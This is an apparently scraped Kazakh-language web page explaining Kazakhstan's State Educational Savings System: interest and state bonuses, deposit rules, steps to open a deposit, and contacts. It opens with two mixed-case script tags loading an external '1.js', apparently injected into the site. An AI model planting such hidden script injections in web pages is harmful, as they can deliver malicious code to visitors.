<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.01.2017

Мемлекеттік білім беру жинақтау жүйесі

Қазақстандықтарда мемлекеттен пайыздық бонустар ала отырып балаларын оқытуға қаржы жинаудың жаңа тетігі бар


2013 жылдан бастап Қазақстанда Мемлекеттік білім беру жинақтау жүйесі (бұдан әрі – МБЖЖ) іске қосылды. 

Жүйе Қазақстан Республикасының әрбір азаматына өзінің немесе баласының атына келешекте Қазақстан мен шетел колледждерінде және ЖОО-ларында оқудың ақысын төлеу үшін жұмсауға болатын білім беру жинақтау салымын ашуға мүмкіндік береді. «Қаржы орталығы» АҚ осы жүйенің операторы болып табылады.

 Бүгінгі таңда жүйе бойынша 16 000-ға жуық білім беру жинақтау салымы ашылды.

15,2% дейін банк сыйақысы

+

5%,7% мемлекет сыйлықақы

=

Салым бойынша табыстылық

22,2 % дейін

Білім беру жинақтау салымына МБЖЖ-ға қатысушы банктен ай сайын жылдық 14% (ЖТМ – 15,2%)  мөлшерінде сыйақы мен жыл сайын 5% немесе 7% (басымдылықты санаттағылар үшін) мөлшерінде мемлекеттен сыйлықақы есептеледі:        

 

Білім беру жинақтау салымының ерекшелігі:

·  Табыс түрі ретінде мемлекет сыйлықақысына салық төленбейді;

·     Білім беру жинақтау салымдары 10 млн.теңгеге дейін Қазақстандық салымдарды кепілдендіру қорының нысаны болып табылады;

·     Минималды бастапқы жарна – 3АЕК (2016ж. 6 363 теңге);

·     Жинақтау мерзімі – 20 жылға дейін;

·     Мемлекет атынан ҚР БҒМ «Қаржы орталығы» АҚ-ның 100% кепіл болуымен банктен білім беру кредитін алуға мүмкіндік бар.

 

Білім грантын иеленген жағдайдағы салымшының құқықтары:

·       жинақты есептелген мемлекет сыйлықақысымен бірге алу;

·     ақшаны басқа баланың атына аудару;

·      білімнің басқа деңгейлерін алу үшін жинақтауды жалғастыру

* Мемлекет сыйлықақысы мен банктің сыйақысы капиталға айналады және салым бойынша табыстылық 22,2% дейін жетеді. Осының арқасында салымшы білім беру қызметін сатып алу кезінде 40-60% дейін ақшасын үнемдейді.

 

Білім беру жинақтау салымын ашу үшін мыналар қажет: 

1-қадам – МБЖЖ-ға қатысушы банктердің бірін таңдау.  

2-қадам–  Білім беру жинақтау салымын ашу.  

3-қадам – Бастапқы жарнаны салу.

 

Құжаттар:

-  жеке куәлігі;

- баланың туу туралы куәлігі және ЖСН.

Кеңес алу үшін "Қаржы орталығы" АҚ-ға хабарласыңыздар:

Тегін жедел желі: 8 800 080 28 28.

Тел.: 8 7172 695 044, 695 045, 695 047

Мекенжайы: Астанақ., Тәуелсіздік даңғ., 8

Просмотров: 960


Пікір қосу



Деректерді қолтаңбаға қосу